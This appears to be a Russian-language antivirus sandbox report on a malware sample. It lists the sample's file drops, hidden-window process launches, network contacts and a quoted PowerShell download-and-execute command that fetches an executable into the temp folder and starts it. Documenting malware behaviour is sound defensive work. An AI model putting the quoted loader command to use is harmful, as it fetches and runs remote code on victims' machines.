Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $str1 как %temp%\llomn.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function orreq([String] $str1){(New-Object System.Net.WebClient).DownloadFile($str1,''%TMP%\llomn.exe'');Start-Process ''%TMP%\llomn.exe'';}try{orreq(''http://176.3...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1888
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bakylqc.bat
- %TEMP%\1008094.cvr
Сетевая активность
Подключается к
- '17#.#1.249.148':80
UDP
- DNS ASK sl##ya.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function orreq([String] $str1){(New-Object System.Net.WebClient).DownloadFile($str1,''%TMP%\llomn.exe'');Start-Process ''%TMP%\llomn.exe'';}try{orreq(''http://176.3...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Bakylqc.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Bakylqc.bat" "
